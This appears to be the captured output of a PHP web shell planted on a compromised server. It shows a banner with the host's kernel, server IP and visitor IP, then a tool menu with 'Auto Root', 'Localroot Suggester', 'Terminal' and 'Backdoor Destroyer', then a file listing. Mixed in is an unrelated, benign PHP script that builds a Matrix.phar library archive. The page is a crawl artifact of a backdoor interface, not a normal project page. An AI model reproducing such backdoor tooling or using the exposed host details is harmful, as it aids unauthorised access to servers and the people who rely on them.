Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.17.154.155
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
markbaker /
matrix /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxrwxr-x
2022-12-02 22:17
classes
[ DIR ]
drwxrwxr-x
2022-12-02 22:17
examples
[ DIR ]
drwxrwxr-x
2022-12-02 22:17
README.md
5.6
KB
-rw-rw-r--
2022-12-02 22:17
buildPhar.php
1.33
KB
-rw-rw-r--
2022-12-02 22:17
composer.json
1.74
KB
-rw-rw-r--
2022-12-02 22:17
infection.json.dist
371
B
-rw-rw-r--
2022-12-02 22:17
license.md
1.08
KB
-rw-rw-r--
2022-12-02 22:17
phpstan.neon
330
B
-rw-rw-r--
2022-12-02 22:17
Save
Rename
<?php # required: PHP 5.3+ and zlib extension // ini option check if (ini_get('phar.readonly')) { echo "php.ini: set the 'phar.readonly' option to 0 to enable phar creation\n"; exit(1); } // output name $pharName = 'Matrix.phar'; // target folder $sourceDir = __DIR__ . DIRECTORY_SEPARATOR . 'classes' . DIRECTORY_SEPARATOR . 'src' . DIRECTORY_SEPARATOR; // default meta information $metaData = array( 'Author' => 'Mark Baker <mark@lange.demon.co.uk>', 'Description' => 'PHP Class for working with Matrix numbers', 'Copyright' => 'Mark Baker (c) 2013-' . date('Y'), 'Timestamp' => time(), 'Version' => '0.1.0', 'Date' => date('Y-m-d') ); // cleanup if (file_exists($pharName)) { echo "Removed: {$pharName}\n"; unlink($pharName); } echo "Building phar file...\n"; // the phar object $phar = new Phar($pharName, null, 'Matrix'); $phar->buildFromDirectory($sourceDir); $phar->setStub( <<<'EOT' <?php spl_autoload_register(function ($className) { include 'phar://' . $className . '.php'; }); try { Phar::mapPhar(); } catch (PharException $e) { error_log($e->getMessage()); exit(1); } include 'phar://functions/sqrt.php'; __HALT_COMPILER(); EOT ); $phar->setMetadata($metaData); $phar->compressFiles(Phar::GZ); echo "Complete.\n"; exit();